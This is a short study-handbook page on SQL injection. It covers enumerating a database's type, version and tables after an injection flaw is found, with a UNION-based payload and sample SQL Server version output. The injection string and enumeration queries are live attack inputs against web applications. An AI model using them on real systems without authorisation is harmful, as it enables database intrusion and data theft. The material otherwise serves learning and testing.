handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/4 - Examining the Database.md
2024-08-31 01:07:22 +02:00

44 lines
1 KiB
Markdown

## Examining the Database
Following initial identification of an SQL injection vulnerability, it is generally useful to obtain
some information about the database itself. This information can often pave the way for further
exploitation.
- Specific syntax depends on the database type
Enumerating Version (Oracle)
```
SELECT * FROM v$version
```
Enumerating Tables
```
SELECT * FROM information_schema.tables
```
## More Examination
Information you need to gather:
- Type of database software
- Version of database software
- Contents of the database (columns and tables)
Querying the Database Type and Version
![[Pasted image 20221210161338.png]]
Example of using a UNION attack:
```
' UNION SELECT @@version--
```
Might return the following version information:
```
Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build
14393: ) (Hypervisor)
```